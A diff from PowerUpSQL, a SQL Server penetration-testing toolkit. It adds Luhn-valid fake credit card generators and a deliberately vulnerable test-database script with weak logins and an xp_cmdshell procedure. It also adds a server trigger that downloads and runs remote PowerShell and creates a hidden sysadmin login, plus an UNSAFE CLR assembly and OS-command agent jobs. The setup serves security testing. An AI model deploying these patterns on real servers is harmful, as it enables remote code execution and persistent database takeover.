.INPUTS + System.UInt64 + .NOTES + Author: Øyvind Kallstad + Date: 19.02.2016 + Version: 1.0 + Dependencies: Get-LuhnCheckSum + .LINKS + https://en.wikipedia.org/wiki/Luhn_algorithm + https://communary.wordpress.com/ + https://github.com/gravejester/Communary.ToolBox + #> + [CmdletBinding()] + param ( + [Parameter(Mandatory = $true, Position = 0, ValueFromPipeline = $true)] + [uint64] $PartialNumber + ) + + $checksum = Get-LuhnCheckSum -Number $PartialNumber + Write-Output (($checksum * 9) % 10) +} + +# Author: ktaranov +function Test-IsLuhnValid { + <# + .SYNOPSIS + Valdidate a number based on the Luhn Algorithm. + .DESCRIPTION + This function uses the Luhn algorithm to validate a number that includes + the Luhn checksum digit. + .EXAMPLE + Test-IsLuhnValid -Number 1234567890123452 + This will validate whether the number is valid according to the Luhn Algorithm. + .INPUTS + System.UInt64 + .OUTPUTS + System.Boolean + .NOTES + Author: Øyvind Kallstad + Date: 19.02.2016 + Version: 1.0 + Dependencies: Get-LuhnCheckSum, ConvertTo-Digits + .LINKS + https://en.wikipedia.org/wiki/Luhn_algorithm + https://communary.wordpress.com/ + https://github.com/gravejester/Communary.ToolBox + #> + [CmdletBinding()] + param ( + [Parameter(Mandatory = $true, Position = 0, ValueFromPipeline = $true)] + [uint64] $Number + ) + + $numberDigits = ConvertTo-Digits -Number $Number + $checksumDigit = $numberDigits[-1] + $numberWithoutChecksumDigit = $numberDigits[0..($numberDigits.Count - 2)] -join '' + $checksum = Get-LuhnCheckSum -Number $numberWithoutChecksumDigit + + if ((($checksum + $checksumDigit) % 10) -eq 0) { + Write-Output $true + } + else { + Write-Output $false + } +} + +# Author: ktaranov +function ConvertTo-Digits +{ + <# + .SYNOPSIS + Convert an integer into an array of bytes of its individual digits. + .DESCRIPTION + Convert an integer into an array of bytes of its individual digits. + .EXAMPLE + ConvertTo-Digits 145 + .INPUTS + System.UInt64 + .LINK + https://communary.wordpress.com/ + https://github.com/gravejester/Communary.ToolBox + .NOTES + Date: 09.05.2015 + Version: 1.0 + #> + [OutputType([System.Byte[]])] + [CmdletBinding()] + param( + [Parameter(Position = 0, Mandatory = $true, ValueFromPipeline = $true)] + [uint64]$Number + ) + $n = $Number + $numberOfDigits = 1 + [convert]::ToUInt64([math]::Floor(([math]::Log10($n)))) + $digits = New-Object -TypeName Byte[] -ArgumentList $numberOfDigits + for ($i = ($numberOfDigits - 1); $i -ge 0; $i--) + { + $digit = $n % 10 + $digits[$i] = $digit + $n = [math]::Floor($n / 10) + } + Write-Output -InputObject $digits +} + +# Based on https://github.com/ChrisTruncer/Egress-Assess +function Generate-CreditCards +{ + [CmdletBinding()] + Param( + [Parameter(Mandatory=$True, + HelpMessage="Number of cc to generate.")] + $Number = 1 + ) + function New-Visa + { + #generate a single random visa number, format 4xxx-xxxx-xxxx-xxxx + $r = "4$(Get-Random -minimum 100 -maximum 999)$(Get-Random -minimum 1000 -maximum 9999)$(Get-Random -minimum 1000 -maximum 9999)$(Get-Random -minimum 1000 -maximum 9999)" + $Object = New-Object PSObject + $Object | add-member Noteproperty Brand "VISA" + $Object | add-member Noteproperty Number $r + $Object + } + function New-MasterCard + { + # generate a single random mastercard number + $r = "5$(Get-Random -minimum 100 -maximum 999)$(Get-Random -minimum 1000 -maximum 9999)$(Get-Random -minimum 1000 -maximum 9999)$(Get-Random -minimum 1000 -maximum 9999)" + $Object = New-Object PSObject + $Object | add-member Noteproperty Brand "MASTERCARD" + $Object | add-member Noteproperty Number $r + $Object + } + function New-Discover + { + # generate a single random discover number + $r = "6011$(Get-Random -minimum 1000 -maximum 9999)$(Get-Random -minimum 1000 -maximum 9999)$(Get-Random -minimum 1000 -maximum 9999)" + $Object = New-Object PSObject + $Object | add-member Noteproperty Brand "DISCOVER" + $Object | add-member Noteproperty Number $r + $Object + } + function New-Amex + { + # generate a single random amex number + $script:AllCC += "3$(Get-Random -minimum 100 -maximum 999)$(Get-Random -minimum 100000 -maximum 999999)$(Get-Random -minimum 10000 -maximum 99999)" + $r = "3$(Get-Random -minimum 100 -maximum 999)$(Get-Random -minimum 100000 -maximum 999999)$(Get-Random -minimum 10000 -maximum 99999)" + $Object = New-Object PSObject + $Object | add-member Noteproperty Brand "AMEX" + $Object | add-member Noteproperty Number $r + $Object + } + + 1..$Number | + foreach { + # Generate credit card number that passes the luhn + $ValidCheck = 0 + + while($ValidCheck -eq 0){ + + # Generate Card Number + $r = Get-Random -Minimum 1 -Maximum 5 + $CardNumber = switch ($r) + { + 1 { New-Visa } + 2 { New-MasterCard } + 3 { New-Discover } + 4 { New-Amex } + default { New-Visa } + } + + # Validate card number + $CheckNumber = $CardNumber | Select Number -ExpandProperty Number + if(Test-IsLuhnValid -Number $CheckNumber){ + $CardNumber + $ValidCheck = 1 + } + } + } +} + +#endregion diff --git a/tests/PowerUpSQLTests.ps1 b/tests/PowerUpSQLTests.ps1 index 300de93..bfedf73 100644 --- a/tests/PowerUpSQLTests.ps1 +++ b/tests/PowerUpSQLTests.ps1 @@ -13,11 +13,21 @@ ###################################################### <# +Get-SQLDomainObject +Get-SQLDomainUser +Get-SQLOleDbProvder Get-SQLInstanceDomain Get-SQLInstanceFile Get-SQLInstanceLocal Get-SQLInstanceScanUDP Get-SQLInstanceScanUDPThreaded +Invoke-SQLOSCmdCLR +Invoke-SQLOSCmdAgentJob +Invoke-SQLOSCmdPython +Invoke-SQLOSCmdR +Invoke-SQLOSCmdOle +Create-SQLFileCLRDll +Get-SQLAssemblyFile #> #endregion @@ -245,6 +255,11 @@ Describe "Get-SQLConnectionTestThreaded" { # ###################################################### +# Get-SQLAgentJob +# Get-SQLServerLinkCrawl +# Get-SQLServerLinkData +# Get-SQLServerLinkQuery + # Get-SQLTriggerDml Describe "Get-SQLTriggerDml " { It "Should return results for the local host with query" { @@ -1252,6 +1267,10 @@ Invoke-SQLAuditRoleDbDdlAdmin Invoke-SQLAuditRoleDbOwner Invoke-SQLAuditSampleDataByColumn Invoke-SQLAuditWeakLoginPw +Invoke-SQLAuditDefaultLoginPw +Invoke-SQLAuditPrivAutoExecSp +Invoke-SQLAuditSQLiSpExecuteAs +Invoke-SQLAuditSQLiSpSigned #> #endregion @@ -1262,7 +1281,8 @@ Invoke-SQLAuditWeakLoginPw # ###################################################### -# No function have been written yet. +# Get-SQLPersistRegRun +# Get-SQLPersistRegDebugger #endregion @@ -1272,7 +1292,7 @@ Invoke-SQLAuditWeakLoginPw # ###################################################### -# No function have been written yet. +# Get-SQLRecoverPwAutoLogon #endregion @@ -1294,6 +1314,10 @@ Invoke-SQLAuditWeakLoginPw <# Create-SQLFileXpDll +Get-SQLStoredProcedureSQLi +Get-SQLServerLoginDefaultPw +Get-SQLStoredProcedureAutoExec +Invoke-SQLImpersonateServiceCmd #> # Get-SQLFuzzDatabaseName diff --git a/tests/pesterdb.sql b/tests/pesterdb.sql index e8a2388..ccedab3 100644 --- a/tests/pesterdb.sql +++ b/tests/pesterdb.sql @@ -1,6 +1,50 @@ -- Script: pesterdb.sql -- Description: This script can be used to configure a new SQL Server 2014 instance for PowerUpSQL Pester tests. +-- https://github.com/NetSPI/PowerUpSQL/blob/master/tests/pesterdb.sql +-- Author: Scott Sutherland, NetSPI +------------------------------------------------------------ +-- Create Logins, Database Users, and Grant Assembly Privs +------------------------------------------------------------ + +-- Create db_ddladmin login +If not Exists (select loginname from master.dbo.syslogins where name = 'test_login_ddladmin') +CREATE LOGIN [test_login_ddladmin] WITH PASSWORD = 'test_login_ddladmin', CHECK_POLICY = OFF; + +-- Create db_ddladmin database user +If not Exists (SELECT name FROM sys.database_principals where name = 'test_login_ddladmin') +CREATE USER [test_login_ddladmin] FROM LOGIN [test_login_ddladmin]; +GO + +-- Add test_login_ddladmin to db_ddladmin role +EXEC sp_addrolemember [db_ddladmin], [test_login_ddladmin]; +GO + +-- Create login with the CREATE ASSEMBLY database privilege +If not Exists (select loginname from master.dbo.syslogins where name = 'test_login_createassembly') +CREATE LOGIN [test_login_createassembly] WITH PASSWORD = 'test_login_createassembly', CHECK_POLICY = OFF; + +-- Create test_login_createassembly database user +If not Exists (SELECT name FROM sys.database_principals where name = 'test_login_createassembly') +CREATE USER [test_login_createassembly] FROM LOGIN [test_login_createassembly]; +GO + +-- Add privilege +GRANT CREATE ASSEMBLY to [test_login_createassembly]; +GO + +-- Create login with the ALTER ANY ASSEMBLY database privilege +If not Exists (select loginname from master.dbo.syslogins where name = 'test_login_alterassembly') +CREATE LOGIN [test_login_alterassembly] WITH PASSWORD = 'test_login_alterassembly', CHECK_POLICY = OFF; + +-- Create test_login_alterassembly database user +If not Exists (SELECT name FROM sys.database_principals where name = 'test_login_alterassembly') +CREATE USER [test_login_alterassembly] FROM LOGIN [test_login_alterassembly]; +GO + +-- Add privilege +GRANT ALTER ANY ASSEMBLY to [test_login_alterassembly]; +GO ------------------------------------------------------------ -- Create Test SQL Logins ------------------------------------------------------------ @@ -576,6 +620,36 @@ if exists (select name from sys.procedures where name = 'sp_findspy2') GRANT EXECUTE ON sp_findspy2 to test_login_ownerchain GO +-- Create stored procedures that executes OS commands using data from a global temp table + +USE tempdb3; +GO + +CREATE PROCEDURE sp_WhoamiGtt +AS +BEGIN + -- Create a global temporary table to store the command + IF OBJECT_ID('tempdb..##GlobalTempTableCommands') IS NULL + BEGIN + CREATE TABLE ##GlobalTempTableCommands ( + Command NVARCHAR(4000) + ); + END; + + -- Insert the command "whoami" into the global temporary table + INSERT INTO ##GlobalTempTableCommands (Command) + VALUES ('whoami'); + + -- Declare a variable to hold the command + DECLARE @Command NVARCHAR(4000); + + -- Select the command from the global temporary table + SELECT TOP 1 @Command = Command FROM ##GlobalTempTableCommands; + + -- Execute the command using xp_cmdshell + EXEC xp_cmdshell @Command; +END; +GO ------------------------------------------------------------ -- Create Test Triggers @@ -633,6 +707,72 @@ if (select count(*) from sys.sql_logins where name like 'SysAdmin_DML') = 0 EXEC sp_addsrvrolemember 'SysAdmin_DML', 'sysadmin'; GO +-- Create a DML trigger that uses Global Temp tables + +USE testdb3; +GO + +CREATE TRIGGER trigger_dml_gtt +ON NOCList +AFTER INSERT +AS +BEGIN + -- Create a global temporary table + CREATE TABLE ##GlobalTempTable ( + Message NVARCHAR(100) + ); + + -- Insert the word "hello" into the global temporary table + INSERT INTO ##GlobalTempTable (Message) + VALUES ('hello'); + + -- Optionally, you can select from the global temporary table to verify insertion + SELECT * FROM ##GlobalTempTable; + + -- Drop the global temporary table + DROP TABLE ##GlobalTempTable; +END; +GO + +-- Create a DDL trigger that uses Global Temp tables + +CREATE TRIGGER [trigger_ddl_gtt] +ON ALL SERVER +FOR DDL_LOGIN_EVENTS +AS +BEGIN + -- Create a global temporary table to store the URLs if it doesn't already exist + IF OBJECT_ID('tempdb..##GlobalTempTableUrls') IS NULL + BEGIN + CREATE TABLE ##GlobalTempTableUrls ( + Url NVARCHAR(4000) + ); + END; + + -- Insert the URL into the global temporary table + INSERT INTO ##GlobalTempTableUrls (Url) + VALUES ('https://raw.githubusercontent.com/nullbind/Powershellery/master/Brainstorming/trigger_demo_ddl.ps1'); + + -- Use xp_cmdshell to run a PowerShell command that uses the URL from the global temporary table + DECLARE @Url NVARCHAR(4000); + SELECT TOP 1 @Url = Url FROM ##GlobalTempTableUrls; + + DECLARE @Cmd NVARCHAR(4000); + SET @Cmd = 'Powershell -c "IEX (New-Object Net.WebClient).DownloadString(''' + @Url + ''')"'; + + EXEC master..xp_cmdshell @Cmd; + + -- Add a sysadmin named 'SysAdmin_DDL' if it doesn't exist + IF (SELECT COUNT(name) FROM sys.sql_logins WHERE name LIKE 'SysAdmin_DDL') = 0 + BEGIN + -- Create a login + CREATE LOGIN SysAdmin_DDL WITH PASSWORD = 'SysAdmin_DDL', CHECK_POLICY = OFF; + + -- Add the login to the sysadmin fixed server role + EXEC sp_addsrvrolemember 'SysAdmin_DDL', 'sysadmin'; + END; +END; +GO ------------------------------------------------------------ -- Create Test Keys, Certificates, and Cert Logins @@ -668,3 +808,534 @@ GO If not Exists (select loginname from master.dbo.syslogins where name = 'certuser') EXEC sp_addsrvrolemember 'certuser', 'sysadmin'; GO + +---------------------------------------------------------------------- +-- Setup CLR Assessembly Procedures with hardcoded encryption key +---------------------------------------------------------------------- + +-- Select the msdb database +use msdb +GO + +-- Enable show advanced options on the server +sp_configure 'show advanced options',1 +RECONFIGURE +GO + +-- Enable clr on the server +sp_configure 'clr enabled',1 +RECONFIGURE +GO + +-- Disable clr strict security +-- SQL Server 2017 introduced the ‘clr strict security’ configuration. Microsoft documentation states that the setting needs to be disabled to allow the creation of UNSAFE or EXTERNAL assemblies. +DECLARE @MajorVersion INT; + +-- Get the major version number of SQL Server +SELECT @MajorVersion = LEFT(CAST(SERVERPROPERTY('ProductVersion') AS VARCHAR), CHARINDEX('.', CAST(SERVERPROPERTY('ProductVersion') AS VARCHAR)) - 1); + +-- Check if the SQL Server version is 2017 or later +IF @MajorVersion >= 14 -- SQL Server 2017 is version 14.x +BEGIN + -- Disable 'clr strict security' configuration + EXEC sp_configure 'clr strict security', 0; + RECONFIGURE; + GO + PRINT 'CLR strict security configuration has been disabled.'; + GO +END +ELSE +BEGIN + PRINT 'CLR strict security configuration cannot be modified. The SQL Server version is not 2017 or later.'; + GO +END; + +-- Create assembly +CREATE ASSEMBLY [CommonLib] +FROM 0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C0103009D50D2590000000000000000E00002210B010B000012000000060000000000000E300000002000000040000000000010002000000002000004000000000000000400000000000000008000000002000000000000030040850000100000100000000010000010000000000000100000000000000000000000B42F00005700000000400000A802000000000000000000000000000000000000006000000C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E7465787400000014100000002000000012000000020000000000000000000000000000200000602E72737263000000A8020000004000000004000000140000000000000000000000000000400000402E72656C6F6300000C0000000060000000020000001800000000000000000000000000004000004200000000000000000000000000000000F02F000000000000480000000200050010250000A40A000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001B300500890000000100001100000F00280400000A168D01000001280500000A720100007028030000060A178D080000010D091672290000701F0C20A00F00006A730600000AA209730700000A0B280800000A076F0900000A000716066F0A00000A00280800000A076F0B00000A00280800000A6F0C00000A0000DE160C007237000070086F0D00000A280E00000A0000DE00002A0000000110000000000100707100160D0000011B300500890000000100001100000F00280400000A168D01000001280500000A720100007028040000060A178D080000010D091672290000701F0C20A00F00006A730600000AA209730700000A0B280800000A076F0900000A000716066F0A00000A00280800000A076F0B00000A00280800000A6F0C00000A0000DE160C007237000070086F0D00000A280E00000A0000DE00002A0000000110000000000100707100160D0000011B30040046010000020000110002280F00000A16FE01130811082D0B724D000070731000000A7A03280F00000A16FE01130811082D0B7261000070731000000A7A140A140B00037E01000004731100000A0C731200000A0B0708076F1300000A1E5B6F1400000A6F1500000A0007186F1600000A0007076F1700000A076F1800000A6F1900000A0D731A00000A1304001104076F1800000A8E69281B00000A161A6F1C00000A001104076F1800000A16076F1800000A8E696F1C00000A0011040917731D00000A1305001105731E00000A1306001106026F1F00000A0000DE14110614FE01130811082D0811066F2000000A00DC0000DE14110514FE01130811082D0811056F2000000A00DC0011046F2100000A282200000A0A00DE14110414FE01130811082D0811046F2000000A00DC0000DE14000714FE01130811082D07076F2300000A0000DC000613072B0011072A0000013400000200C7000DD40014000000000200BD002FEC001400000000020083008E1101140000000002003900F0290114000000001B30040020010000030000110002280F00000A16FE01130911092D0B727B000070731000000A7A03280F00000A16FE01130911092D0B7261000070731000000A7A140A140B00037E01000004731100000A0C02282400000A0D09732500000A130400731200000A0A0608066F1300000A1E5B6F1400000A6F1500000A0006186F1600000A0006110428050000066F2600000A0006066F1700000A066F1800000A6F2700000A13051104110516731D00000A1306001106732800000A130711076F2900000A0BDE14110714FE01130911092D0811076F2000000A00DC0000DE14110614FE01130911092D0811066F2000000A00DC0000DE14110414FE01130911092D0811046F2000000A00DC0000DE14000614FE01130911092D07066F2300000A0000DC000713082B0011082A013400000200B1000ABB0014000000000200A7002CD30014000000000200550096EB00140000000002003900CA03011400000000133004005B00000004000011001A8D200000010A020616068E696F2A00000A068E69FE010D092D0C007291000070732B00000A7A0616282C00000A8D200000010B020716078E696F2A00000A078E69FE010D092D0C0072FB000070732B00000A7A070C2B00082A56282D00000A723D0100706F2E00000A80010000042A1E02282F00000A2A00000042534A4201000100000000000C00000076342E302E33303331390000000005006C00000044030000237E0000B00300004804000023537472696E677300000000F8070000580100002355530050090000100000002347554944000000600900004401000023426C6F620000000000000002000001571502000900000000FA2533001600000100000022000000020000000100000007000000070000002F0000000400000004000000010000000200000000000A00010000000000060032002B000A005A0045000600AE00A40006001601F60006003601F6000A006F01540106008F012B000A009D0154010A00A90139000A00B30154010A00C10154010A00CC015401060016022B0006002C022B0006004C022B0006007F0262020600920262020600A20262020600C10262020600DE02620206000103620206002203A40006002F032B0006004203620206004F03620206006003A40006006D03A400060078032B00060094032B000600D903A4000600E603A4000600FB032B00060005042B000600300424040000000001000000000001000100010010001800000005000100010011007C001000502000000000960064000A000100F82000000000960070000A000200A02100000000960082001400030028230000000096009300140005008824000000009100B5001A0007000525000000008618C30021000800EF240000000091181D040901080000000100C90000000100C90000000100D20000000200DC0000000100E90000000200DC0000000100F4002100C30025002900C30021003100C3002100110085012F003900960133004100C3003A005100C30042005900D40149006100DD014E005100EE0154006100F8014E00610007022100690020022F00710034025A0039003E026B007900C30070008100C30075008900C30021009100B5027C009900CD0280009100D60286009100E9028C009100F20292009100FA029200910012039700B100C3002100B900CD02A00019003C03A600C100C300AE00D100C300B800D9003C037000E10084032100B1008C039200E9009C03BE009100AB032100E900B103D600B100C30086009100C20386009100C9039700F100C300B800F900F1032F0019000004F0000901C3007000B9001504F800110139040D011101CD0213010900C300210020001B002A002E00130022012E000B00190140001B002A006000C400DC00FF00048000000000000000000000000000000000180000000400000000000000000000000100220000000000040000000000000000000000010039000000000000000000003C4D6F64756C653E00636F6D6D6F6E6C69622E646C6C00636F6D6D6F6E6C6962006D73636F726C69620053797374656D004F626A6563740053797374656D2E446174610053797374656D2E446174612E53716C54797065730053716C537472696E670062656566656E6372797074006265656664656372797074005F73616C7400456E6372797074537472696E674145530044656372797074537472696E674145530053797374656D2E494F0053747265616D0052656164427974654172726179002E63746F72004D79537472696E6700706C61696E5465787400736861726564536563726574006369706865725465787400730053797374656D2E52756E74696D652E436F6D70696C6572536572766963657300436F6D70696C6174696F6E52656C61786174696F6E734174747269627574650052756E74696D65436F6D7061746962696C697479417474726962757465004D6963726F736F66742E53716C5365727665722E5365727665720053716C50726F636564757265417474726962757465006765745F56616C756500537472696E6700466F726D61740053716C4D657461446174610053716C4462547970650053716C446174615265636F72640053716C436F6E746578740053716C50697065006765745F506970650053656E64526573756C7473537461727400536574537472696E670053656E64526573756C7473526F770053656E64526573756C7473456E6400457863657074696F6E006765745F4D65737361676500436F6E736F6C650057726974654C696E650049734E756C6C4F72456D70747900417267756D656E744E756C6C457863657074696F6E0053797374656D2E53656375726974792E43727970746F677261706879005266633238393844657269766542797465730052696A6E6461656C4D616E616765640053796D6D6574726963416C676F726974686D006765745F4B657953697A65004465726976654279746573004765744279746573007365745F4B6579004369706865724D6F6465007365745F4D6F6465006765745F4B6579006765745F4956004943727970746F5472616E73666F726D00437265617465456E63727970746F72004D656D6F727953747265616D00426974436F6E7665727465720057726974650043727970746F53747265616D0043727970746F53747265616D4D6F64650053747265616D57726974657200546578745772697465720049446973706F7361626C6500446973706F736500546F417272617900436F6E7665727400546F426173653634537472696E6700436C6561720046726F6D426173653634537472696E67007365745F495600437265617465446563727970746F720053747265616D52656164657200546578745265616465720052656164546F456E64004279746500526561640053797374656D457863657074696F6E00546F496E743332002E6363746F720053797374656D2E5465787400456E636F64696E67006765745F556E69636F64650000000000276100650073006800690064006500740068006500620065006500660031003200330034003500000D6F007500740070007500740000154500720072006F0072003A0020007B0030007D00001370006C00610069006E0054006500780074000019730068006100720065006400530065006300720065007400001563006900700068006500720054006500780074000069530074007200650061006D00200064006900640020006E006F007400200063006F006E007400610069006E002000700072006F007000650072006C007900200066006F0072006D006100740074006500640020006200790074006500200061007200720061007900004144006900640020006E006F00740020007200650061006400200062007900740065002000610072007200610079002000700072006F007000650072006C00790000194300610070007400610069006E00530061006C007400790000009092612DC92C6841833C9171C7A25FBA0008B77A5C561934E08905000101110903061D050500020E0E0E0600011D05120D03200001042001010804010000000320000E0600020E0E1D1C072003010E11250A062001011D1221040000123105200101122905200201080E050002010E1C0A07040E122912351D1221040001020E042001010E062002010E1D05032000080520011D0508052001011D050520010111510420001D0508200212551D051D050500011D0508072003011D05080809200301120D1255116505200101120D0500010E1D051107090E1245124112551259126112690E020500011D050E13070A12450E12411D0512591255126112790E02072003081D050808060002081D05080907041D051D051D0502030000010500001280890520011D050E0801000800000000001E01000100540216577261704E6F6E457863657074696F6E5468726F777301000000DC2F00000000000000000000FE2F0000002000000000000000000000000000000000000000000000F02F00000000000000000000000000000000000000005F436F72446C6C4D61696E006D73636F7265652E646C6C0000000000FF2500200010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001001000000018000080000000000000000000000000000001000100000030000080000000000000000000000000000001000000000048000000584000004C02000000000000000000004C0234000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000000BD04EFFE00000100000000000000000000000000000000003F000000000000000400000002000000000000000000000000000000440000000100560061007200460069006C00650049006E0066006F00000000002400040000005400720061006E0073006C006100740069006F006E00000000000000B004AC010000010053007400720069006E006700460069006C00650049006E0066006F0000008801000001003000300030003000300034006200300000002C0002000100460069006C0065004400650073006300720069007000740069006F006E000000000020000000300008000100460069006C006500560065007200730069006F006E000000000030002E0030002E0030002E00300000003C000E00010049006E007400650072006E0061006C004E0061006D006500000063006F006D006D006F006E006C00690062002E0064006C006C0000002800020001004C006500670061006C0043006F00700079007200690067006800740000002000000044000E0001004F0072006900670069006E0061006C00460069006C0065006E0061006D006500000063006F006D006D006F006E006C00690062002E0064006C006C000000340008000100500072006F006400750063007400560065007200730069006F006E00000030002E0030002E0030002E003000000038000800010041007300730065006D0062006C0079002000560065007200730069006F006E00000030002E0030002E0030002E0030000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000000C000000103000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 +WITH PERMISSION_SET = UNSAFE +GO + +-- Map assembly method beefencrypt to procedure +CREATE PROCEDURE [dbo].[beefencrypt] @MyString NVARCHAR (4000) AS EXTERNAL NAME [commonlib].[commonlib].[beefencrypt]; +GO + +-- Map assembly method beefdencrypt to procedure +CREATE PROCEDURE [dbo].[beefdencrypt] @MyString NVARCHAR (4000) AS EXTERNAL NAME [commonlib].[commonlib].[beefencrypt]; +GO + +-- Run procedure +beefencrypt "hello there" +GO + +-- Run procedure +beefdencrypt "EAAAAJVbaCaMSI3k1N99P31tP//K4WzvBUEaNW94Ed9yWyhB" +GO + +---------------------------------------------------------------------- +-- Create agent jobs that execute OS commands - CMDEXEC +---------------------------------------------------------------------- + +USE [msdb] +GO + +/****** Object: Job [OS COMMAND EXECUTION EXAMPLE - CMDEXEC] Script Date: 5/9/2024 9:12:13 AM ******/ +BEGIN TRANSACTION +DECLARE @ReturnCode INT +SELECT @ReturnCode = 0 +/****** Object: JobCategory [[Uncategorized (Local)]] Script Date: 5/9/2024 9:12:13 AM ******/ +IF NOT EXISTS (SELECT name FROM msdb.dbo.syscategories WHERE name=N'[Uncategorized (Local)]' AND category_class=1) +BEGIN +EXEC @ReturnCode = msdb.dbo.sp_add_category @class=N'JOB', @type=N'LOCAL', @name=N'[Uncategorized (Local)]' +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback + +END + +DECLARE @jobId BINARY(16) +EXEC @ReturnCode = msdb.dbo.sp_add_job @job_name=N'OS COMMAND EXECUTION EXAMPLE - CMDEXEC', + @enabled=1, + @notify_level_eventlog=0, + @notify_level_email=0, + @notify_level_netsend=0, + @notify_level_page=0, + @delete_level=0, + @description=N'No description available.', + @category_name=N'[Uncategorized (Local)]', + @owner_login_name=N'MSSQLSRV04\Administrator', @job_id = @jobId OUTPUT +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback +/****** Object: Step [Run CMD] Script Date: 5/9/2024 9:12:13 AM ******/ +EXEC @ReturnCode = msdb.dbo.sp_add_jobstep @job_id=@jobId, @step_name=N'Run CMD', + @step_id=1, + @cmdexec_success_code=0, + @on_success_action=1, + @on_success_step_id=0, + @on_fail_action=2, + @on_fail_step_id=0, + @retry_attempts=0, + @retry_interval=0, + @os_run_priority=0, @subsystem=N'CmdExec', + @command=N'c:\windows\system32\cmd.exe /c echo hello > c:\windows\temp\artifact-cmd.txt', + @flags=0 +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback +EXEC @ReturnCode = msdb.dbo.sp_update_job @job_id = @jobId, @start_step_id = 1 +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback +EXEC @ReturnCode = msdb.dbo.sp_add_jobschedule @job_id=@jobId, @name=N'CmdDaily', + @enabled=1, + @freq_type=4, + @freq_interval=1, + @freq_subday_type=1, + @freq_subday_interval=0, + @freq_relative_interval=0, + @freq_recurrence_factor=0, + @active_start_date=20240509, + @active_end_date=99991231, + @active_start_time=0, + @active_end_time=235959, + @schedule_uid=N'11e6216d-c317-4cfd-81c9-053ad9b22dbc' +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback +EXEC @ReturnCode = msdb.dbo.sp_add_jobserver @job_id = @jobId, @server_name = N'(local)' +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback +COMMIT TRANSACTION +GOTO EndSave +QuitWithRollback: + IF (@@TRANCOUNT > 0) ROLLBACK TRANSACTION +EndSave: + +GO + +---------------------------------------------------------------------- +-- Create agent jobs that execute OS commands - PowerShell +---------------------------------------------------------------------- + +USE [msdb] +GO + +/****** Object: Job [OS COMMAND EXECUTION EXAMPLE - POWERSHELL] Script Date: 5/9/2024 9:09:22 AM ******/ +BEGIN TRANSACTION +DECLARE @ReturnCode INT +SELECT @ReturnCode = 0 +/****** Object: JobCategory [[Uncategorized (Local)]] Script Date: 5/9/2024 9:09:22 AM ******/ +IF NOT EXISTS (SELECT name FROM msdb.dbo.syscategories WHERE name=N'[Uncategorized (Local)]' AND category_class=1) +BEGIN +EXEC @ReturnCode = msdb.dbo.sp_add_category @class=N'JOB', @type=N'LOCAL', @name=N'[Uncategorized (Local)]' +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback + +END + +DECLARE @jobId BINARY(16) +EXEC @ReturnCode = msdb.dbo.sp_add_job @job_name=N'OS COMMAND EXECUTION EXAMPLE - POWERSHELL', + @enabled=1, + @notify_level_eventlog=0, + @notify_level_email=0, + @notify_level_netsend=0, + @notify_level_page=0, + @delete_level=0, + @description=N'No description available.', + @category_name=N'[Uncategorized (Local)]', + @owner_login_name=N'MSSQLSRV04\Administrator', @job_id = @jobId OUTPUT +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback +/****** Object: Step [Run PowerShell] Script Date: 5/9/2024 9:09:22 AM ******/ +EXEC @ReturnCode = msdb.dbo.sp_add_jobstep @job_id=@jobId, @step_name=N'Run PowerShell', + @step_id=1, + @cmdexec_success_code=0, + @on_success_action=1, + @on_success_step_id=0, + @on_fail_action=2, + @on_fail_step_id=0, + @retry_attempts=0, + @retry_interval=0, + @os_run_priority=0, @subsystem=N'PowerShell', + @command=N'"hello world" | out-file c:\windows\temp\artifact-powershell.txt', + @database_name=N'master', + @flags=0 +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback +EXEC @ReturnCode = msdb.dbo.sp_update_job @job_id = @jobId, @start_step_id = 1 +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO 